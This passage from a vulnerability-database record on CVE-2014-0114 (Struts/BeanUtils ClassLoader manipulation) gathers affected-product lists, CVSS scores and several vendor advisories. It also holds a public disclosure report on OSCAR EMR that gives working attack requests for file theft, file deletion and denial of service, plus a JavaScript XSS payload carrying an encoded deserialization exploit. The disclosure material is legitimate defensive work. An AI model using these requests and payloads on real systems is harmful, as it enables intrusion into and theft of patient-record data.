"7.6.1-06", }, { model: "retail allocation", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.0", }, { model: "campaign", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.6", }, { model: "campaign", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "contact optimization", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.1", }, { model: "tiered storage manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.0.1-02", }, { model: "device manager software (solaris", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.1.1-00(x64))", }, { model: "rational reporting for development intelligence", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.0.1", }, { model: "enterprise linux desktop workstation client", scope: "eq", trust: 0.3, vendor: "redhat", version: "5", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-08-00", }, { model: "manager", scope: "eq", trust: 0.3, vendor: "suse", version: "111.7", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-09-00-01", }, { model: "websphere enterprise service bus", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.5", }, { model: "tuning manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.4.0-02", }, { model: "linux powerpc", scope: "eq", trust: 0.3, vendor: "debian", version: "6.0", }, { model: "global link manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.6.1-01", }, { model: "device manager software", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.2.1-00", }, { model: "big-ip edge gateway hf7", scope: "eq", trust: 0.3, vendor: "f5", version: "11.1.0", }, { model: "big-ip webaccelerator", scope: "eq", trust: 0.3, vendor: "f5", version: "10.2.1", }, { model: "device manager software (linux(sles", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.3.0-00", }, { model: "tivoli 
provisioning manager", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.2", }, { model: "big-ip webaccelerator", scope: "eq", trust: 0.3, vendor: "f5", version: "11.3", }, { model: "device manager software (solaris", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.2-00(x64))", }, { model: "big-ip edge gateway hf3", scope: "eq", trust: 0.3, vendor: "f5", version: "11.2.1", }, { model: "web interface for content management", scope: "eq", trust: 0.3, vendor: "ibm", version: "1.0.4", }, { model: "device manager software )", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.1-03", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.20", }, { model: "tuning manager software (solaris(sp", scope: "eq", trust: 0.3, vendor: "hitachi", version: "7.4.0-01", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.60", }, { model: "lotus quickr for websphere portal", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "business process manager express", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0.0", }, { model: "jp1/performance management web console", scope: "eq", trust: 0.3, vendor: "hitachi", version: "-09-00-02", }, { model: "retail allocation", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "tiered storage manager software (linux(rhel", scope: "eq", trust: 0.3, vendor: "hitachi", version: "6.4.0-07", }, { model: "rational application developer", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.0.4", }, { model: "tivoli integrated portal", scope: "eq", trust: 0.3, vendor: "ibm", version: "2.1", }, { model: "contact optimization", scope: "eq", trust: 0.3, vendor: "ibm", version: "7.0", }, ], sources: [ { db: "BID", id: "67121", }, { db: "CNNVD", id: "CNNVD-201404-581", }, { db: "NVD", id: "CVE-2014-0114", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { 
"@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Rene Gielen", sources: [ { db: "BID", id: "67121", }, { db: "PACKETSTORM", id: "126455", }, { db: "CNNVD", id: "CNNVD-201404-581", }, ], trust: 1, }, cve: "CVE-2014-0114", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "nvd@nist.gov", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", exploitabilityScore: 10, id: "CVE-2014-0114", impactScore: 6.4, integrityImpact: "PARTIAL", severity: "HIGH", trust: 1.1, vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, ], cvssV3: [], severity: [ { author: "nvd@nist.gov", id: "CVE-2014-0114", trust: 1, value: "HIGH", }, { author: "CNNVD", id: "CNNVD-201404-581", trust: 0.6, value: "HIGH", }, { author: "VULMON", id: "CVE-2014-0114", trust: 0.1, value: "HIGH", }, ], }, ], sources: [ { db: "VULMON", id: "CVE-2014-0114", }, { db: "CNNVD", id: "CNNVD-201404-581", }, { db: "NVD", id: "CVE-2014-0114", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other 
products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1. Apache Struts is prone to a security-bypass vulnerability because it fails to adequately handle user-supplied input. \nAn attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks. \nApache Struts versions 1.0.0 through 1.3.10 are vulnerable. \n\nSecurity Fix(es):\n\n* Apache Struts 1: Class Loader manipulation via request parameters\n(CVE-2014-0114)\n\n* thrift: Improper file path sanitization in\nt_go_generator.cc:format_go_output() of the go client library can allow an\nattacker to inject commands (CVE-2016-5397)\n\n* slf4j: Deserialisation vulnerability in EventData constructor can allow\nfor arbitrary code execution (CVE-2018-8088)\n\n* jolokia: JMX proxy mode vulnerable to remote code execution\n(CVE-2018-1000130)\n\n* bouncycastle: DSA does not fully validate ASN.1 encoding during signature\nverification allowing for injection of unsigned data (CVE-2016-1000338)\n\n* bouncycastle: Information leak in AESFastEngine class (CVE-2016-1000339)\n\n* bouncycastle: Information exposure in DSA signature generation via timing\nattack (CVE-2016-1000341)\n\n* bouncycastle: ECDSA improper validation of ASN.1 encoding of signature\n(CVE-2016-1000342)\n\n* bouncycastle: DHIES implementation allowed the use of ECB mode\n(CVE-2016-1000344)\n\n* bouncycastle: DHIES/ECIES CBC modes are vulnerable to padding oracle\nattack (CVE-2016-1000345)\n\n* bouncycastle: Other party DH public keys are not fully validated\n(CVE-2016-1000346)\n\n* bouncycastle: ECIES implementation allowed the use of ECB mode\n(CVE-2016-1000352)\n\n* async-http-client: Invalid URL parsing with '?' 
(CVE-2017-14063)\n\n* undertow: File descriptor leak caused by\nJarURLConnection.getLastModified() allows attacker to cause a denial of\nservice (CVE-2018-1114)\n\n* spring-framework: Directory traversal vulnerability with static resources\non Windows filesystems (CVE-2018-1271)\n\n* tika: Infinite loop in BPGParser can allow remote attacker to cause a\ndenial of service (CVE-2018-1338)\n\n* tika: Infinite loop in ChmParser can allow remote attacker to cause a\ndenial of service (CVE-2018-1339)\n\n* pdfbox: Infinite loop in AFMParser.java allows for out of memory erros\nvia crafted PDF (CVE-2018-8036)\n\n* jolokia: Cross site scripting in the HTTP servlet (CVE-2018-1000129)\n\n* bouncycastle: flaw in the low-level interface to RSA key pair generator\n(CVE-2018-1000180)\n\n* bouncycastle: Carry propagation bug in math.raw.Nat??? class\n(CVE-2016-1000340)\n\n* bouncycastle: DSA key pair generator generates a weak private key by\ndefault (CVE-2016-1000343)\n\n* spring-framework: Multipart content pollution (CVE-2018-1272)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section. \n\nRed Hat would like to thank Chris McCown for reporting CVE-2018-8088. \n\nInstallation instructions are located in the download section of the\ncustomer portal. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n1091938 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters\n1487563 - CVE-2017-14063 async-http-client: Invalid URL parsing with '?'\n1544620 - CVE-2016-5397 thrift: Improper file path sanitization in t_go_generator.cc:format_go_output() of the go client library can allow an attacker to inject commands\n1548909 - CVE-2018-8088 slf4j: Deserialisation vulnerability in EventData constructor can allow for arbitrary code execution\n1559316 - CVE-2018-1000130 jolokia: JMX proxy mode vulnerable to remote code execution\n1559317 - CVE-2018-1000129 jolokia: Cross site scripting in the HTTP servlet\n1564408 - CVE-2018-1272 spring-framework: Multipart content pollution\n1571050 - CVE-2018-1271 spring-framework: Directory traversal vulnerability with static resources on Windows filesystems\n1572421 - CVE-2018-1338 tika: Infinite loop in BPGParser can allow remote attacker to cause a denial of service\n1572424 - CVE-2018-1339 tika: Infinite loop in ChmParser can allow remote attacker to cause a denial of service\n1573045 - CVE-2018-1114 undertow: File descriptor leak caused by JarURLConnection.getLastModified() allows attacker to cause a denial of service\n1588306 - CVE-2018-1000180 bouncycastle: flaw in the low-level interface to RSA key pair generator\n1588313 - CVE-2016-1000338 bouncycastle: DSA does not fully validate ASN.1 encoding during signature verification allowing for injection of unsigned data\n1588314 - CVE-2016-1000344 bouncycastle: DHIES implementation allowed the use of ECB mode\n1588323 - CVE-2016-1000345 bouncycastle: DHIES/ECIES CBC modes are vulnerable to padding oracle attack\n1588327 - CVE-2016-1000346 bouncycastle: Other party DH public keys are not fully validated\n1588330 - CVE-2016-1000352 bouncycastle: ECIES implementation allowed the use of ECB mode\n1588688 - CVE-2016-1000340 bouncycastle: Carry propagation bug in math.raw.Nat??? 
class\n1588695 - CVE-2016-1000339 bouncycastle: Information leak in AESFastEngine class\n1588708 - CVE-2016-1000341 bouncycastle: Information exposure in DSA signature generation via timing attack\n1588715 - CVE-2016-1000342 bouncycastle: ECDSA improper validation of ASN.1 encoding of signature\n1588721 - CVE-2016-1000343 bouncycastle: DSA key pair generator generates a weak private key by default\n1597490 - CVE-2018-8036 pdfbox: Infinite loop in AFMParser.java allows for out of memory erros via crafted PDF\n\n5. Summary:\n\nFuse ESB Enterprise 7.1.0 R1 P4 (Patch 4 on Rollup Patch 1), a security\nupdate that addresses one security issue, is now available from the Red Hat\nCustomer Portal. \nA remote attacker could use this flaw to manipulate the ClassLoader used by\nan application server running Struts 1. This could lead to remote code\nexecution under certain conditions. (CVE-2014-0114)\n\nRefer to the readme.txt file included with the patch files for\ninstallation instructions. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114\n http://advisories.mageia.org/MGASA-2014-0219.html\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Enterprise Server 5:\n 2341ea3fd6c92a10ab4c0be7ef5ca9da mes5/i586/struts-1.2.9-6.1mdvmes5.2.i586.rpm\n 8d911347cc4fdb08383a2d6ad21860e6 mes5/i586/struts-javadoc-1.2.9-6.1mdvmes5.2.i586.rpm\n fc1e7ac540a1d4c923cf773769c976b2 mes5/i586/struts-manual-1.2.9-6.1mdvmes5.2.i586.rpm\n 3304297e4b88aae688e8edcdd11bf478 mes5/i586/struts-webapps-tomcat5-1.2.9-6.1mdvmes5.2.i586.rpm \n b508c226756fcb2a82a8b5e2e84af466 mes5/SRPMS/struts-1.2.9-6.1mdvmes5.2.src.rpm\n\n Mandriva Enterprise Server 5/X86_64:\n 7e2abd47c0862fa5010ee686d76d2353 mes5/x86_64/struts-1.2.9-6.1mdvmes5.2.x86_64.rpm\n 96dd8e36bf4b46577498ad8616dce319 mes5/x86_64/struts-javadoc-1.2.9-6.1mdvmes5.2.x86_64.rpm\n 
37a1b595d7f2f73bdff8d13bcb70e0a6 mes5/x86_64/struts-manual-1.2.9-6.1mdvmes5.2.x86_64.rpm\n 8c298a1e1e9e8ad81acb0166b2f18109 mes5/x86_64/struts-webapps-tomcat5-1.2.9-6.1mdvmes5.2.x86_64.rpm \n b508c226756fcb2a82a8b5e2e84af466 mes5/SRPMS/struts-1.2.9-6.1mdvmes5.2.src.rpm\n\n Mandriva Business Server 1/X86_64:\n 1e1b9440affefd05d5fe0c4860fdcd9b mbs1/x86_64/struts-1.3.10-3.1.mbs1.noarch.rpm\n 5ae68b0b7f991676f67562a51dd956a7 mbs1/x86_64/struts-javadoc-1.3.10-3.1.mbs1.noarch.rpm \n f135f96b6d2121b157b7a62afd449ea6 mbs1/SRPMS/struts-1.3.10-3.1.mbs1.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n <security*mandriva.com>\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFTdeNbmqjQ0CJFipgRAo5XAJ4oaaS6iRfHSPHEO3og+Se4kWkdfgCgrhMb\nHUtc9GTxbEwte2/fTU7bJ5M=\n=5Ewj\n-----END PGP SIGNATURE-----\n. Title: Multiple vulnerabilities in OSCAR EMR\nProduct: OSCAR EMR\nVendor: Oscar McMaster\nTested version: 15.21beta361\nRemediation status: Unknown\nReported by: Brian D. Hysell\n\n-----\n\nProduct Description:\n\n\"OSCAR is open-source Electronic Medical Record (EMR) software that\nwas first developed at McMaster University by Dr. David Chan. 
It is\ncontinuously enriched by contributions from OSCAR users and the\nCharter OSCAR Service Providers that support them. OSCAR has been\ncertified by OntarioMD, and verified as IHE compliant, achievements\nmade possible by the creation and success of OSCAR EMR's ISO\n13485:2003 certified Quality Management System.\"\n\n-----\n\nTimeline:\n\n29 Mar 2016 - Vendor contacted\n29 Mar 2016 - Vendor responded\n29 Apr 2016 - Vendor contacted for permission to share redacted report\nwith third party\n02 May 2016 - Vendor responded\n17 Jan 2017 - Lead developer contacted (no response)\n01 Jul 2018 - Vendor and lead developer contacted for follow-up,\ninformed of intended 15 Aug disclosure (no response)\n12 Aug 2018 - Alternate email address attempted for lead developer (no response)\n15 Aug 2018 - Vulnerabilities publicly disclosed\n\n-----\n\nContents:\n\nThis report uses OVE identifiers: http://www.openwall.com/ove/\n\nOVE-20160329-0001: Database backup disclosure or denial of service via\ninsecure dependency\nOVE-20160329-0003: Remote code execution via unsafe object deserialization\nOVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability in\nsecurity report interface\nOVE-20160329-0007: SQL injection\nOVE-20160329-0008: Path traversal\nOVE-20160329-0002: Insecure direct object reference in document manager\nOVE-20160329-0005: Denial of service via resource exhaustion\nOVE-20160329-0006: Insecure password storage\nOVE-20160329-0009: Cross-site request forgery\n\n-----\n\nIssue details:\n\n=== OVE-20160329-0001: Database backup disclosure or denial of service\nvia insecure dependency ===\n\nOSCAR uses a version of Apache Struts, 1.2.7, which is vulnerable to\nCVE-2014-0114. 
\n\nAn authenticated user can issue the following request with different /\nomitted cookie headers:\n/oscar/login.do?class.classLoader.resources.dirContext.docBase=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster\n\nConsequently, he or she can access (using a valid session cookie),\ne.g., /oscar/OscarBackup.sql.gz\n\nAn unauthenticated attacker is prevented from doing likewise by the\n\"LoginFilter\" servlet filter, but can still carry out a\ndenial-of-service attack impeding any access to the application until\nTomcat is restarted by issuing a request like the following:\n/oscar/login.do?class.classLoader.resources.dirContext.docBase=invalid\n\n=== OVE-20160329-0003: Remote code execution via unsafe object\ndeserialization ===\n\nTraceabilityReportProcessor deserializes user-provided data, allowing\nremote code execution given the presence of known-vulnerable libraries\nin the classpath such as ROME 1.0. This functionality is only\navailable to administrators but can be exploited via XSS\n(OVE-20160329-0004) or CSRF (issue 9) using a payload generated with\nysoserial. \n\nIn the tested configuration PMmodule/GenericIntake/ImportForm.jsp is\ninaccessible due to the following exception\n\"org.springframework.beans.factory.NoSuchBeanDefinitionException: No\nbean named 'oscarSecurityManager' is defined\", but were it to be\naccessible, it would be vulnerable as well. \n\n=== OVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability\nin security report interface ===\n\nlogReport.jsp, in general, does not escape data it outputs to the\npage; in particular, on line 283, prop.getProperty(\"contentId\") is\nprinted unescaped. As a result, if an attacker includes Javascript in\nhis or her username during a login attempt, it will be executed if an\nadministrator views the Security Log Report for that timeframe. 
The\ntext printed in the \"Keyword\" column is cut off at 80 characters, but\nthat is more than enough to load an externally-hosted script, such as\nthe following script exploiting the deserialization RCE\nOVE-20160329-0003:\n\nvar decodedBase64 =\natob(\"H4sIAJ8881YAA61WzW8bRRR/YyfexHWaJs1Xm6ZNSUvdtN3NR5M0uKJt0qZ1cEhFQnvwwYzXU2fDene7O5tsOHBA4sIBCcGFfwAOtIdKCBCVkCrEBU5InEBFXOBGOVRFXPh4M+vEbhJiU7rSvtl9895v3rz35s279Ss0ei60LdMVqvrcMNUr1Fuao06j8v29L7te+TYKkRmImzYtzFCd224amvmSy7wl2ywEzrnzIJ/VJiQR8SJYUrdLqudbqrdmFQydcsO21BuMFVSj5JjqfH6Z6XyKUeuN95UfVxrem41ANAO7c7ppW4zmTSbmOJzKII6GOFoVjiZwNIGjTVeLpzKwK8du+tT0Qu3BGtqXNmRRtSXH7QXuGlYxVD5ZQ3mxSjoVOLjnEzvv+TFb79O7X43Ov7oagUgG2nJG0bJddtW1HeZyg3kcWjMiHJoIh7bAOBrYkLPzyxzawwmTWkUtdGO4+sFK+KZt00Q+Lu8duVRy+BoCdD5y+z6OfpPEAKH4TXgdwySoIkgC9Z9bt952iyp1qL7E1IDiMqphceZa1FQDz+S6yl0aqIsMt0Q589I4Nl+fv2fd+mg0CrE0+tGwCsziL/qlPMNU2Z1DBcszGU8jP8hCPJdf40y3C2Kb0Wx2KgsxjDv18Lc9W7W7acHDjTfmLFpij+889H1K+M72uePzat91Vfmuwkc3iTT9Gx/flQu/8Oe+zmLxhwnpE5G4yI9kp2497P4j1rT4U5kde/Prvz7/AqeH4UwcovCMAuMKHFXgWQJ7POYa1LzGXA+9/XL6IgEyS6BlGl3PMYuuUdNnjbf73334zv3fnicQO2tYBsePaPL4NQIN0+gFgrE2LBb6a1EkCMGt2jrCUgTH/zKzgS8ZHoG9C9zPL5Z9epWuiXNJIJG2LOZKlzEUGsuseXZonOaEMl7okMu0UGTcO7INSorgwRasG7ZbIuAmN44A5oQW5oQmc0JbzwlN5oR2cX4uld1WumRWZEN7jNeYiykdfspDcoVaBZO5KeGSpoKt+yXMH1J1+OtZHlWXQhzc/tT/N4ZA/FKgM0ceIwWOEfjgv/mjpgUFXtIuLs5dCAwvjSyKlbW2Ul0+NMpwIg+exAoCStmXBC48DU8u2L6rsxlDpHGinIGqOKQJiMMuBZIERp8gYQmcrzcirm9xo8S0C3kPU1zn60gEOmSxMOyK8fK0TdaLvI60kS0EDtXYC4borG6WS0Fbpaq9FBqpwCD6DAXL/wQ6k8czW8RSCTgJp+JwAlQERBOY0z8y1ARDWCpYwHQCx5JbS2Y1EBZHnWGNTcAIjAqg0wQOVmy/uoolZWxybHxyaPz00PjI8JmJEQL9mZ0lUnAY24AooBX47odGiOGoyOagSfIw5EgTyNFwJDg2Dn4K5I4UaUEak0wVdiNNhALQChM4YvmDDpQSyufwjQreZsVRqdgfTpYVxVcndMl5At3Qgxr78Du0UcD2lmHTkrsN7ISEHQwnt4U9AH2yA0IvwiFcvrJAExzf2HQvzgip1g8hSjKfgdY+/AmMXb8j4SJot6CHoQ3HOKpEYAD2QLMvLupuxP5u4zrqFddRpwLdCvQosK/e6+jmL8aDs6XLPU/nOorO2PaW6+dozesHteopDPsJDNQBhVvf3BX968GudTh3TF9Sf/qmNqVvu5zfK2lHVXS7RHQdDg14mFxnlUBQu3+udK6P3uq5+/PvPW2ykcTWClnTYS/Vtk0rJXtIkUjNgbPiQp+QCFSs
5urGvV9p7aDyBI5Q6kDDBnc2rLorbn709mzrwIPhzaYJqAOP2yKGQ+ESgvauyAZVkBbJ6BdkQP4LEquQ4B9DtscYvgwAAA==\");\nvar binaryArray = new Uint8Array(new ArrayBuffer(decodedBase64.length));\nfor(var i = 0; i < binaryArray.length; i++) {\n binaryArray[i] = decodedBase64.charCodeAt(i);\n}\nvar payload = new Blob([binaryArray], {type: \"application/x-gzip\"});\nvar formData = new FormData();\nformData.append(\"file\", payload);\nformData.append(\"submit\", \"Generate\");\nvar xhr = new XMLHttpRequest();\nxhr.open(\"POST\", \"/oscar/admin/GenerateTraceabilityReportAction.do\");\nxhr.send(formData);\n\nXSS was not a focus of this test; other confirmed or likely XSS\nvulnerabilities are:\n* Reflected XSS through the errormsg parameter in loginfailed.jsp\n* Reflected XSS through the signatureRequestId parameter in tabletSignature.jsp\n* Reflected XSS through the noteId parameter, line 1562 in\nCaseManagementViewAction (untested)\n* Reflected XSS through the pdfName parameter when an exception has\nbeen thrown, line 1174 in ManageDocumentAction (untested)\n* Reflected XSS through the pharmaName and pharmaFax parameters, line\n149 in FrmCustomedPDFServlet (untested)\n* Reflected XSS through the id and followupValue parameters, line 81\nin EctAddShortMeasurementAction (untested)\n\n=== OVE-20160329-0007: SQL injection ===\n\nOn line 239 of oscarMDS/PatientSearch.jsp, the orderby parameter is\nconcatenated into an SQL statement rather than parameterized; likewise\nthe content parameter on lines 217, 223, and 229 of\nadmin/logReport.jsp. In both cases these errors result in error-based\nSQL injection vulnerabilities; the former allows authenticated users\nwith access to oscarMDS/PatientSearch.jsp to access information beyond\ntheir privilege levels while the latter is accessible only to\nadministrators. 
\n\n=== OVE-20160329-0008: Path traversal ===\n\nImportLogDownloadAction reads and outputs an arbitrary absolute file\npath provided by the user; DelImageAction deletes a user-specified\nfilename without accounting for the possibility of relative path\ntraversal (i.e., the inclusion of \"../\" in the filename). \n\nAny authenticated user can exploit the former issue to steal files\nfrom the system, e.g.,\n/oscar/form/importLogDownload.do?importlog=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster/OscarBackup.sql.gz\n\nAn authenticated user with access to eforms can delete files writeable\nby the Tomcat user, e.g.,\n/oscar/eform/deleteImage.do?filename=../../../../oscar/index.jsp\n\n=== OVE-20160329-0002: Insecure direct object reference in document manager ===\n\nManageDocumentAction.display() does not check the permissions\nassociated with the requested document ID (doc_no) before providing it\nto the requesting user. Given\n/oscar/dms/ManageDocument.do?method=display&doc_no=X&providerNo=Y, a\nuser with access to the document management interface can view\narbitrary documents by incrementing or decrementing X, regardless of\nwhether they have been marked private. \n\n=== OVE-20160329-0005: Denial of service via resource exhaustion ===\n\nuploadSignature.jsp, which is accessible to and operable by\nunauthenticated users, saves uploaded files to a temporary directory\nbut never deletes them. An attacker can upload many junk files and\neventually consume all disk space available to the /tmp directory,\nimpeding access to the application depending on the functionality in\nquestion and the partition layout of the host system (the effects are\ncrippling and pervasive if /tmp is on the same partition as /; they\nare much less so if /tmp is on a separate partition). 
\n\n=== OVE-20160329-0006: Insecure password storage ===\n\nPasswords are stored as SHA-1 hashes; unless unusually complex,\npasswords stored in that manner are typically easily recoverable with\na tool such as oclHashcat. In OSCAR each hash is stored as a string of\ndecimal numbers, rather than hexadecimal or raw bytes. This somewhat\nnon-traditional representation adds a bit of programming work to the\ncracking process, but does not represent a major impediment to attack. \n\n=== OVE-20160329-0009: Cross-site request forgery ===\n\nThe application lacks protection against cross-site request forgery\nattacks. A CSRF attack could be used against an administrator to\nexploit the deserialization RCE in a manner similar to the example\nprovided with OVE-20160329-0004. \n\nReferences:\n\nCVE-2014-0114 (SSRT101662)\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\nSiteScope Affected version\n Resolution patch details\n Link to download\n\n11.1x\n SiteScope 11.13 Windows 32-bit Cumulative Fixes\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00315\n\n SiteScope 11.13 Windows 64-bit Cumulative Fixes\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00316\n\n SiteScope 11.13 Linux 32-bit Cumulative Fixes\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00317\n\n SiteScope 11.13 Linux 64-bit Cumulative Fixes\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00318\n\n SiteScope 11.13 Solaris 32-bit Cumulative Fixes\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00319\n\n SiteScope 11.13 Solaris 64-bit Cumulative Fixes\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00320\n\n11.2x\n SiteScope 11.24.271 Intermediate Patch for Windows 32bit and 64bit\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00321\n\n SiteScope 11.24.271 Intermediate Patch for Windows 32bit on 64bit\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00322\n\n SiteScope 11.24.271 Intermediate 
Patch for Linux\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00323\n\n SiteScope 11.24.271 Intermediate Patch for Solaris\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00324\n\nHISTORY\nVersion:1 (rev.1) - 12 August 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer's patch management policy. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201607-09\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: Commons-BeanUtils: Arbitrary code execution\n Date: July 20, 2016\n Bugs: #534498\n ID: 201607-09\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nApache Commons BeanUtils does not properly suppress the class property,\nwhich could lead to the remote execution of arbitrary code. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Commons BeanUtils users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \">=dev-java/commons-beanutils-1.9.2\"\n\nReferences\n==========\n\n[ 1 ] CVE-2014-0114\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0114\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201607-09\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users' machines is of utmost\nimportance to us. 
Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Important: Red Hat A-MQ Broker 7.5 release and security update\nAdvisory ID: RHSA-2019:2995-01\nProduct: Red Hat JBoss AMQ\nAdvisory URL: https://access.redhat.com/errata/RHSA-2019:2995\nIssue date: 2019-10-10\nKeywords: amq,messaging,integration,broker\nCross references: RHEA-2019:45713-01\nCVE Names: CVE-2014-0114\n====================================================================\n1. Summary:\n\nRed Hat A-MQ Broker 7.5 is now available from the Red Hat Customer Portal. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Description:\n\nAMQ Broker is a high-performance messaging implementation based on ActiveMQ\nArtemis. It uses an asynchronous journal for fast message persistence, and\nsupports multiple languages, protocols, and platforms. \n\nThis release of Red Hat A-MQ Broker 7.5.0 serves as a replacement for Red\nHat A-MQ Broker 7.4.1, and includes security and bug fixes, and\nenhancements. For further information, refer to the release notes linked to\nin the References section. 
